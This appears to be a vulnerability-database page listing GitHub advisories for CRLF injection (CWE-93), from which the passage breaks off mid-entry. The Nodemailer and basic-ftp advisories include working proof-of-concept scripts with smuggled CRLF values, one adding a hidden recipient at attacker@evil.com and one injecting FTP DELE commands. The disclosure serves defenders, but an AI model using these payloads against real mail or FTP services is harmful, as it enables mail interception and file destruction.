Common Weakness Enumeration

CWE-93

Allowed

Improper Neutralization of CRLF Sequences ('CRLF Injection')

Abstraction: Base · Status: Draft

The product uses CRLF (carriage return line feeds) as a special element, e.g. to separate lines or records, but it does not neutralize or incorrectly neutralizes CRLF sequences from inputs.

323 vulnerabilities reference this CWE, most recent first.

GHSA-9MMM-R5XW-7773

Vulnerability from github – Published: 2026-05-12 21:31 – Updated: 2026-05-12 21:31
VLAI
Details

PowerSYSTEM Center email notification service is affected by a CRLF injection vulnerability when using SMTPS communication.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-35504"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-93"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-05-12T21:16:15Z",
    "severity": "MODERATE"
  },
  "details": "PowerSYSTEM Center email notification service is affected by a CRLF injection vulnerability when using SMTPS communication.",
  "id": "GHSA-9mmm-r5xw-7773",
  "modified": "2026-05-12T21:31:36Z",
  "published": "2026-05-12T21:31:36Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35504"
    },
    {
      "type": "WEB",
      "url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-132-02.json"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-132-02"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-9RPW-6GHH-QX6Q

Vulnerability from github – Published: 2024-03-12 15:32 – Updated: 2024-03-12 15:32
VLAI
Details

The software does not neutralize or incorrectly neutralizes certain characters before the data is included in outgoing HTTP headers. The inclusion of invalidated data in an HTTP header allows an attacker to specify the full HTTP response represented by the browser. An attacker could control the response and craft attacks such as cross-site scripting and cache poisoning attacks.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-1226"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-93"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-03-12T15:15:47Z",
    "severity": "HIGH"
  },
  "details": "The software does not neutralize or incorrectly neutralizes certain characters before the data is included in outgoing HTTP headers. The inclusion of invalidated data in an HTTP header allows an attacker to specify the full HTTP response represented by the browser. An attacker could control the response and craft attacks such as cross-site scripting and cache poisoning attacks.",
  "id": "GHSA-9rpw-6ghh-qx6q",
  "modified": "2024-03-12T15:32:21Z",
  "published": "2024-03-12T15:32:21Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1226"
    },
    {
      "type": "WEB",
      "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-rejettos-http-file-server"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-C4RV-J252-RMPG

Vulnerability from github – Published: 2026-04-14 18:30 – Updated: 2026-04-22 15:31
VLAI
Details

CWE-93 Improper Neutralization of CRLF Sequences ('CRLF Injection') vulnerability exists that could cause application user credentials to reset when a Web Admin user alters the POST /setPCBEDesc request payload.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-2400"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-93"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-04-14T16:16:38Z",
    "severity": "MODERATE"
  },
  "details": "CWE-93 Improper Neutralization of CRLF Sequences (\u0027CRLF Injection\u0027) vulnerability exists that could cause application user credentials to reset  when  a Web Admin user alters the POST /setPCBEDesc request payload.",
  "id": "GHSA-c4rv-j252-rmpg",
  "modified": "2026-04-22T15:31:32Z",
  "published": "2026-04-14T18:30:35Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2400"
    },
    {
      "type": "WEB",
      "url": "https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-104-01\u0026p_enDocType=Security+and+Safety+Notice\u0026p_File_Name=SEVD-2026-104-01.pdf"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-C7W3-X93F-QMM8

Vulnerability from github – Published: 2026-03-26 22:26 – Updated: 2026-03-26 22:26
VLAI
Summary
Nodemailer has SMTP command injection due to unsanitized `envelope.size` parameter
Details

Summary

When a custom envelope object is passed to sendMail() with a size property containing CRLF characters (\r\n), the value is concatenated directly into the SMTP MAIL FROM command without sanitization. This allows injection of arbitrary SMTP commands, including RCPT TO — silently adding attacker-controlled recipients to outgoing emails.

Details

In lib/smtp-connection/index.js (lines 1161-1162), the envelope.size value is concatenated into the SMTP MAIL FROM command without any CRLF sanitization:

if (this._envelope.size && this._supportedExtensions.includes('SIZE')) {
    args.push('SIZE=' + this._envelope.size);
}

This contrasts with other envelope parameters in the same function that ARE properly sanitized: - Addresses (from, to): validated for [\r\n<>] at lines 1107-1127 - DSN parameters (dsn.ret, dsn.envid, dsn.orcpt): encoded via encodeXText() at lines 1167-1183

The size property reaches this code path through MimeNode.setEnvelope() in lib/mime-node/index.js (lines 854-858), which copies all non-standard envelope properties verbatim:

const standardFields = ['to', 'cc', 'bcc', 'from'];
Object.keys(envelope).forEach(key => {
    if (!standardFields.includes(key)) {
        this._envelope[key] = envelope[key];
    }
});

Since _sendCommand() writes the command string followed by \r\n to the raw TCP socket, a CRLF in the size value terminates the MAIL FROM command and starts a new SMTP command.

Note: by default, Nodemailer constructs the envelope automatically from the message's from/to fields and does not include size. This vulnerability requires the application to explicitly pass a custom envelope object with a size property to sendMail(). While this limits the attack surface, applications that expose envelope configuration to users are affected.

PoC

ave the following as poc.js and run with node poc.js:

const net = require('net');
const nodemailer = require('nodemailer');

// Minimal SMTP server that logs raw commands
const server = net.createServer(socket => {
    socket.write('220 localhost ESMTP\r\n');
    let buffer = '';
    socket.on('data', chunk => {
        buffer += chunk.toString();
        const lines = buffer.split('\r\n');
        buffer = lines.pop();
        for (const line of lines) {
            if (!line) continue;
            console.log('C:', line);
            if (line.startsWith('EHLO')) {
                socket.write('250-localhost\r\n250-SIZE 10485760\r\n250 OK\r\n');
            } else if (line.startsWith('MAIL FROM')) {
                socket.write('250 OK\r\n');
            } else if (line.startsWith('RCPT TO')) {
                socket.write('250 OK\r\n');
            } else if (line === 'DATA') {
                socket.write('354 Start\r\n');
            } else if (line === '.') {
                socket.write('250 OK\r\n');
            } else if (line.startsWith('QUIT')) {
                socket.write('221 Bye\r\n');
                socket.end();
            }
        }
    });
});

server.listen(0, '127.0.0.1', () => {
    const port = server.address().port;
    console.log('SMTP server on port', port);
    console.log('Sending email with injected RCPT TO...\n');

    const transporter = nodemailer.createTransport({
        host: '127.0.0.1',
        port,
        secure: false,
        tls: { rejectUnauthorized: false },
    });

    transporter.sendMail({
        from: 'sender@example.com',
        to: 'recipient@example.com',
        subject: 'Normal email',
        text: 'This is a normal email.',
        envelope: {
            from: 'sender@example.com',
            to: ['recipient@example.com'],
            size: '100\r\nRCPT TO:<attacker@evil.com>',
        },
    }, (err) => {
        if (err) console.error('Error:', err.message);
        console.log('\nExpected output above:');
        console.log('  C: MAIL FROM:<sender@example.com> SIZE=100');
        console.log('  C: RCPT TO:<attacker@evil.com>        <-- INJECTED');
        console.log('  C: RCPT TO:<recipient@example.com>');
        server.close();
        transporter.close();
    });
});

Expected output:

SMTP server on port 12345
Sending email with injected RCPT TO...

C: EHLO [127.0.0.1]
C: MAIL FROM:<sender@example.com> SIZE=100
C: RCPT TO:<attacker@evil.com>
C: RCPT TO:<recipient@example.com>
C: DATA
...
C: .
C: QUIT

The RCPT TO:<attacker@evil.com> line is injected by the CRLF in the size field, silently adding an extra recipient to the email.

Impact

This is an SMTP command injection vulnerability. An attacker who can influence the envelope.size property in a sendMail() call can:

  • Silently add hidden recipients to outgoing emails via injected RCPT TO commands, receiving copies of all emails sent through the affected transport
  • Inject arbitrary SMTP commands (e.g., RSET, additional MAIL FROM to send entirely separate emails through the server)
  • Leverage the sending organization's SMTP server reputation for spam or phishing delivery

The severity is mitigated by the fact that the envelope object must be explicitly provided by the application. Nodemailer's default envelope construction from message headers does not include size. Applications that pass through user-controlled data to the envelope options (e.g., via API parameters, admin panels, or template configurations) are vulnerable.

Affected versions: at least v8.0.3 (current); likely all versions where envelope.size is supported.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "nodemailer"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "8.0.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-93"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-26T22:26:46Z",
    "nvd_published_at": null,
    "severity": "LOW"
  },
  "details": "### Summary\nWhen a custom `envelope` object is passed to `sendMail()` with a `size` property containing CRLF characters (`\\r\\n`), the value is concatenated directly into the SMTP `MAIL FROM` command without sanitization. This allows injection of arbitrary SMTP commands, including `RCPT TO` \u2014 silently adding attacker-controlled recipients to outgoing emails.\n\n\n### Details\nIn `lib/smtp-connection/index.js` (lines 1161-1162), the `envelope.size` value is concatenated into the SMTP `MAIL FROM` command without any CRLF sanitization:\n\n```javascript\nif (this._envelope.size \u0026\u0026 this._supportedExtensions.includes(\u0027SIZE\u0027)) {\n    args.push(\u0027SIZE=\u0027 + this._envelope.size);\n}\n```\n\nThis contrasts with other envelope parameters in the same function that ARE properly sanitized:\n- **Addresses** (`from`, `to`): validated for `[\\r\\n\u003c\u003e]` at lines 1107-1127\n- **DSN parameters** (`dsn.ret`, `dsn.envid`, `dsn.orcpt`): encoded via `encodeXText()` at lines 1167-1183\n\nThe `size` property reaches this code path through `MimeNode.setEnvelope()` in `lib/mime-node/index.js` (lines 854-858), which copies all non-standard envelope properties verbatim:\n\n```javascript\nconst standardFields = [\u0027to\u0027, \u0027cc\u0027, \u0027bcc\u0027, \u0027from\u0027];\nObject.keys(envelope).forEach(key =\u003e {\n    if (!standardFields.includes(key)) {\n        this._envelope[key] = envelope[key];\n    }\n});\n```\n\nSince `_sendCommand()` writes the command string followed by `\\r\\n` to the raw TCP socket, a CRLF in the `size` value terminates the `MAIL FROM` command and starts a new SMTP command.\n\nNote: by default, Nodemailer constructs the envelope automatically from the message\u0027s `from`/`to` fields and does not include `size`. This vulnerability requires the application to explicitly pass a custom `envelope` object with a `size` property to `sendMail()`. \nWhile this limits the attack surface, applications that expose envelope configuration to users are affected.\n\n### PoC\nave the following as `poc.js` and run with `node poc.js`:\n\n```javascript\nconst net = require(\u0027net\u0027);\nconst nodemailer = require(\u0027nodemailer\u0027);\n\n// Minimal SMTP server that logs raw commands\nconst server = net.createServer(socket =\u003e {\n    socket.write(\u0027220 localhost ESMTP\\r\\n\u0027);\n    let buffer = \u0027\u0027;\n    socket.on(\u0027data\u0027, chunk =\u003e {\n        buffer += chunk.toString();\n        const lines = buffer.split(\u0027\\r\\n\u0027);\n        buffer = lines.pop();\n        for (const line of lines) {\n            if (!line) continue;\n            console.log(\u0027C:\u0027, line);\n            if (line.startsWith(\u0027EHLO\u0027)) {\n                socket.write(\u0027250-localhost\\r\\n250-SIZE 10485760\\r\\n250 OK\\r\\n\u0027);\n            } else if (line.startsWith(\u0027MAIL FROM\u0027)) {\n                socket.write(\u0027250 OK\\r\\n\u0027);\n            } else if (line.startsWith(\u0027RCPT TO\u0027)) {\n                socket.write(\u0027250 OK\\r\\n\u0027);\n            } else if (line === \u0027DATA\u0027) {\n                socket.write(\u0027354 Start\\r\\n\u0027);\n            } else if (line === \u0027.\u0027) {\n                socket.write(\u0027250 OK\\r\\n\u0027);\n            } else if (line.startsWith(\u0027QUIT\u0027)) {\n                socket.write(\u0027221 Bye\\r\\n\u0027);\n                socket.end();\n            }\n        }\n    });\n});\n\nserver.listen(0, \u0027127.0.0.1\u0027, () =\u003e {\n    const port = server.address().port;\n    console.log(\u0027SMTP server on port\u0027, port);\n    console.log(\u0027Sending email with injected RCPT TO...\\n\u0027);\n\n    const transporter = nodemailer.createTransport({\n        host: \u0027127.0.0.1\u0027,\n        port,\n        secure: false,\n        tls: { rejectUnauthorized: false },\n    });\n\n    transporter.sendMail({\n        from: \u0027sender@example.com\u0027,\n        to: \u0027recipient@example.com\u0027,\n        subject: \u0027Normal email\u0027,\n        text: \u0027This is a normal email.\u0027,\n        envelope: {\n            from: \u0027sender@example.com\u0027,\n            to: [\u0027recipient@example.com\u0027],\n            size: \u0027100\\r\\nRCPT TO:\u003cattacker@evil.com\u003e\u0027,\n        },\n    }, (err) =\u003e {\n        if (err) console.error(\u0027Error:\u0027, err.message);\n        console.log(\u0027\\nExpected output above:\u0027);\n        console.log(\u0027  C: MAIL FROM:\u003csender@example.com\u003e SIZE=100\u0027);\n        console.log(\u0027  C: RCPT TO:\u003cattacker@evil.com\u003e        \u003c-- INJECTED\u0027);\n        console.log(\u0027  C: RCPT TO:\u003crecipient@example.com\u003e\u0027);\n        server.close();\n        transporter.close();\n    });\n});\n```\n\n**Expected output:**\n```\nSMTP server on port 12345\nSending email with injected RCPT TO...\n\nC: EHLO [127.0.0.1]\nC: MAIL FROM:\u003csender@example.com\u003e SIZE=100\nC: RCPT TO:\u003cattacker@evil.com\u003e\nC: RCPT TO:\u003crecipient@example.com\u003e\nC: DATA\n...\nC: .\nC: QUIT\n```\n\nThe `RCPT TO:\u003cattacker@evil.com\u003e` line is injected by the CRLF in the `size` field, silently adding an extra recipient to the email.\n\n### Impact\nThis is an SMTP command injection vulnerability. An attacker who can influence the `envelope.size` property in a `sendMail()` call can:\n\n- **Silently add hidden recipients** to outgoing emails via injected `RCPT TO` commands, receiving copies of all emails sent through the affected transport\n- **Inject arbitrary SMTP commands** (e.g., `RSET`, additional `MAIL FROM` to send entirely separate emails through the server)\n- **Leverage the sending organization\u0027s SMTP server reputation** for spam or phishing delivery\n\nThe severity is mitigated by the fact that the `envelope` object must be explicitly provided by the application. Nodemailer\u0027s default envelope construction from message headers does not include `size`. Applications that pass through user-controlled data to the envelope options (e.g., via API parameters, admin panels, or template configurations) are vulnerable.\n\nAffected versions: at least v8.0.3 (current); likely all versions where `envelope.size` is supported.",
  "id": "GHSA-c7w3-x93f-qmm8",
  "modified": "2026-03-26T22:26:46Z",
  "published": "2026-03-26T22:26:46Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/nodemailer/nodemailer/security/advisories/GHSA-c7w3-x93f-qmm8"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nodemailer/nodemailer/commit/2d7b9710e63555a1eb13d721296c51186d4b5651"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nodemailer/nodemailer"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Nodemailer has SMTP command injection due to unsanitized `envelope.size` parameter"
}

GHSA-C9J2-XR8M-5HH8

Vulnerability from github – Published: 2022-05-17 02:42 – Updated: 2025-04-20 03:38
VLAI
Details

CRLF injection vulnerability in the web interface in OpenVPN Access Server 2.1.4 allows remote attackers to inject arbitrary HTTP headers and consequently conduct session fixation attacks and possibly HTTP response splitting attacks via "%0A" characters in the PATH_INFO to session_start/.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2017-5868"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-93"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-05-26T01:29:00Z",
    "severity": "MODERATE"
  },
  "details": "CRLF injection vulnerability in the web interface in OpenVPN Access Server 2.1.4 allows remote attackers to inject arbitrary HTTP headers and consequently conduct session fixation attacks and possibly HTTP response splitting attacks via \"%0A\" characters in the PATH_INFO to __session_start__/.",
  "id": "GHSA-c9j2-xr8m-5hh8",
  "modified": "2025-04-20T03:38:14Z",
  "published": "2022-05-17T02:42:44Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-5868"
    },
    {
      "type": "WEB",
      "url": "https://sysdream.com/news/lab/2017-05-05-cve-2017-5868-openvpn-access-server-crlf-injection-with-session-fixation"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2017/05/23/13"
    },
    {
      "type": "WEB",
      "url": "http://www.securitytracker.com/id/1038547"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-C9Q8-FG52-4CRV

Vulnerability from github – Published: 2026-03-25 18:31 – Updated: 2026-03-25 18:31
VLAI
Details

A vulnerability in the web-based Cisco IOx application hosting environment management interface of Cisco IOS XE Software could allow an unauthenticated, remote attacker to perform a carriage return line feed (CRLF) injection attack against a user.

This vulnerability is due to insufficient validation of user input. An attacker could exploit this vulnerability by sending crafted packets to an affected device. A successful exploit could allow the attacker to arbitrarily inject log entries, manipulate the structure of log files, or obscure legitimate log events.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-20113"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-93"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-03-25T16:16:15Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability in the web-based Cisco IOx application hosting environment management interface of Cisco IOS XE Software could allow an unauthenticated, remote attacker to perform a carriage return line feed (CRLF) injection attack against a user.\n\n This vulnerability is due to insufficient validation of user input. An attacker could exploit this vulnerability by sending crafted packets to an affected device. A successful exploit could allow the attacker to arbitrarily inject log entries, manipulate the structure of log files, or obscure legitimate log events.",
  "id": "GHSA-c9q8-fg52-4crv",
  "modified": "2026-03-25T18:31:47Z",
  "published": "2026-03-25T18:31:47Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20113"
    },
    {
      "type": "WEB",
      "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iox-crlf-NvgKTKJZ"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-CCG4-2824-V53P

Vulnerability from github – Published: 2026-03-28 12:30 – Updated: 2026-03-28 12:30
VLAI
Details

The Page Builder: Pagelayer – Drag and Drop website builder plugin for WordPress is vulnerable to Improper Neutralization of CRLF Sequences ('CRLF Injection') in all versions up to, and including, 2.0.7. This is due to the contact form handler performing placeholder substitution on attacker-controlled form fields and then passing the resulting values into email headers without removing CR/LF characters. This makes it possible for unauthenticated attackers to inject arbitrary email headers (for example Bcc / Cc) and abuse form email delivery via the 'email' parameter granted they can target a contact form configured to use placeholders in mail template headers.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-2442"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-93"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-03-28T10:16:30Z",
    "severity": "MODERATE"
  },
  "details": "The Page Builder: Pagelayer \u2013 Drag and Drop website builder plugin for WordPress is vulnerable to Improper Neutralization of CRLF Sequences (\u0027CRLF Injection\u0027) in all versions up to, and including, 2.0.7. This is due to the contact form handler performing placeholder substitution on attacker-controlled form fields and then passing the resulting values into email headers without removing CR/LF characters. This makes it possible for unauthenticated attackers to inject arbitrary email headers (for example Bcc / Cc) and abuse form email delivery via the \u0027email\u0027 parameter granted they can target a contact form configured to use placeholders in mail template headers.",
  "id": "GHSA-ccg4-2824-v53p",
  "modified": "2026-03-28T12:30:29Z",
  "published": "2026-03-28T12:30:29Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2442"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/changeset/3464204/pagelayer"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ce101aad-10a3-4a8c-9f4a-0e38e35b4dab?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-CF58-JJQ5-73MM

Vulnerability from github – Published: 2022-05-13 01:06 – Updated: 2022-05-13 01:06
VLAI
Details

CRLF injection vulnerability in the web-based management (WBM) interface in Unify (former Siemens) OpenStage SIP and OpenScape Desk Phone IP V3 devices before R3.32.0 allows remote authenticated users to modify the root password and consequently access the debug port using the serial interface via the ssh-password parameter to page.cmd.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2014-9563"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-93"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-04-12T21:29:00Z",
    "severity": "MODERATE"
  },
  "details": "CRLF injection vulnerability in the web-based management (WBM) interface in Unify (former Siemens) OpenStage SIP and OpenScape Desk Phone IP V3 devices before R3.32.0 allows remote authenticated users to modify the root password and consequently access the debug port using the serial interface via the ssh-password parameter to page.cmd.",
  "id": "GHSA-cf58-jjq5-73mm",
  "modified": "2022-05-13T01:06:13Z",
  "published": "2022-05-13T01:06:13Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-9563"
    },
    {
      "type": "WEB",
      "url": "https://networks.unify.com/security/advisories/OBSO-1501-02.pdf"
    },
    {
      "type": "WEB",
      "url": "https://www.modzero.ch/advisories/MZ-14-02-Siemens-Unify-OpenStage.txt"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-CFJ9-2VGR-HPXP

Vulnerability from github – Published: 2026-06-24 15:31 – Updated: 2026-06-30 03:37
VLAI
Details

Jenkins Script Security Plugin 1402.v94c9ce464861 and earlier does not reject Groovy AST transformation annotations carrying an extensions member, allowing attackers able to run sandboxed Groovy scripts to execute code outside the sandbox if a suitable script is present on the classpath of the component that evaluates the script.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-57281"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-917",
      "CWE-93"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-06-24T14:17:34Z",
    "severity": "HIGH"
  },
  "details": "Jenkins Script Security Plugin 1402.v94c9ce464861 and earlier does not reject Groovy AST transformation annotations carrying an extensions member, allowing attackers able to run sandboxed Groovy scripts to execute code outside the sandbox if a suitable script is present on the classpath of the component that evaluates the script.",
  "id": "GHSA-cfj9-2vgr-hpxp",
  "modified": "2026-06-30T03:37:10Z",
  "published": "2026-06-24T15:31:47Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-57281"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/security/cve/CVE-2026-57281"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492200"
    },
    {
      "type": "WEB",
      "url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-57281.json"
    },
    {
      "type": "WEB",
      "url": "https://www.jenkins.io/security/advisory/2026-06-24/#SECURITY-3793"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-CHQC-8P9Q-PQ6Q

Vulnerability from github – Published: 2026-04-08 20:02 – Updated: 2026-04-09 19:06
VLAI
Summary
basic-ftp has FTP Command Injection via CRLF
Details

Summary

basic-ftp version 5.2.0 allows FTP command injection via CRLF sequences (\r\n) in file path parameters passed to high-level path APIs such as cd(), remove(), rename(), uploadFrom(), downloadTo(), list(), and removeDir(). The library's protectWhitespace() helper only handles leading spaces and returns other paths unchanged, while FtpContext.send() writes the resulting command string directly to the control socket with \r\n appended. This lets attacker-controlled path strings split one intended FTP command into multiple commands.

Affected product

Product Affected versions Fixed version
basic-ftp (npm) 5.2.0 (confirmed) no fix available as of 2026-04-04

Vulnerability details

  • CWE: CWE-93 - Improper Neutralization of CRLF Sequences ('CRLF Injection')
  • CVSS 3.1: 8.6 (High)
  • Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L
  • Affected component: dist/Client.js, all path-handling methods via protectWhitespace() and send()

The vulnerability exists because of two interacting code patterns:

1. Inadequate path sanitization in protectWhitespace() (line 677):

async protectWhitespace(path) {
    if (!path.startsWith(" ")) {
        return path;  // No sanitization of \r\n characters
    }
    const pwd = await this.pwd();
    const absolutePathPrefix = pwd.endsWith("/") ? pwd : pwd + "/";
    return absolutePathPrefix + path;
}

This function only handles leading whitespace. It does not strip or reject \r (0x0D) or \n (0x0A) characters anywhere in the path string.

2. Direct socket write in send() (FtpContext.js line 177):

send(command) {
    this._socket.write(command + "\r\n", this.encoding);
}

The send() method appends \r\n to the command and writes directly to the TCP socket. If the command string already contains \r\n sequences (from unsanitized path input), the FTP server interprets them as command delimiters, causing the single intended command to be split into multiple commands.

Affected methods (all call protectWhitespace()send()): - cd(path)CWD ${path} - remove(path)DELE ${path} - list(path)LIST ${path} - downloadTo(localPath, remotePath)RETR ${remotePath} - uploadFrom(localPath, remotePath)STOR ${remotePath} - rename(srcPath, destPath)RNFR ${srcPath} / RNTO ${destPath} - removeDir(path)RMD ${path}

Technical impact

An attacker who controls file path parameters can inject arbitrary FTP protocol commands, enabling:

  1. Arbitrary file deletion: Inject DELE /critical-file to delete files on the FTP server
  2. Directory manipulation: Inject MKD or RMD commands to create/remove directories
  3. File exfiltration: Inject RETR commands to trigger downloads of unintended files
  4. Server command execution: On FTP servers supporting SITE EXEC, inject system commands
  5. Session hijacking: Inject USER/PASS commands to re-authenticate as a different user
  6. Service disruption: Inject QUIT to terminate the FTP session unexpectedly

The attack is realistic in applications that accept user input for FTP file paths — for example, web applications that allow users to specify files to download from or upload to an FTP server.

Proof of concept

Prerequisites:

mkdir basic-ftp-poc && cd basic-ftp-poc
npm init -y
npm install basic-ftp@5.2.0

Mock FTP server (ftp-server-mock.js):

const net = require('net');
const server = net.createServer(conn => {
  console.log('[+] Client connected');
  conn.write('220 Mock FTP\r\n');
  let buffer = '';
  conn.on('data', data => {
    buffer += data.toString();
    const lines = buffer.split('\r\n');
    buffer = lines.pop();
    for (const line of lines) {
      if (!line) continue;
      console.log('[CMD] ' + JSON.stringify(line));
      if (line.startsWith('USER')) conn.write('331 OK\r\n');
      else if (line.startsWith('PASS')) conn.write('230 Logged in\r\n');
      else if (line.startsWith('FEAT')) conn.write('211 End\r\n');
      else if (line.startsWith('TYPE')) conn.write('200 OK\r\n');
      else if (line.startsWith('PWD'))  conn.write('257 "/"\r\n');
      else if (line.startsWith('OPTS')) conn.write('200 OK\r\n');
      else if (line.startsWith('STRU')) conn.write('200 OK\r\n');
      else if (line.startsWith('CWD'))  conn.write('250 OK\r\n');
      else if (line.startsWith('DELE')) conn.write('250 Deleted\r\n');
      else if (line.startsWith('QUIT')) { conn.write('221 Bye\r\n'); conn.end(); }
      else conn.write('200 OK\r\n');
    }
  });
});
server.listen(2121, () => console.log('[*] Mock FTP on port 2121'));

Exploit (poc.js):

const ftp = require('basic-ftp');

async function exploit() {
  const client = new ftp.Client();
  client.ftp.verbose = true;
  try {
    await client.access({
      host: '127.0.0.1',
      port: 2121,
      user: 'anonymous',
      password: 'anonymous'
    });

    // Attack 1: Inject DELE command via cd()
    // Intended: CWD harmless.txt
    // Actual:   CWD harmless.txt\r\nDELE /important-file.txt
    const maliciousPath = "harmless.txt\r\nDELE /important-file.txt";
    console.log('\n=== Attack 1: DELE injection via cd() ===');
    try { await client.cd(maliciousPath); } catch(e) {}

    // Attack 2: Double DELE via remove()
    const maliciousPath2 = "decoy.txt\r\nDELE /secret-data.txt";
    console.log('\n=== Attack 2: DELE injection via remove() ===');
    try { await client.remove(maliciousPath2); } catch(e) {}

  } finally {
    client.close();
  }
}
exploit();

Running the PoC:

# Terminal 1: Start mock FTP server
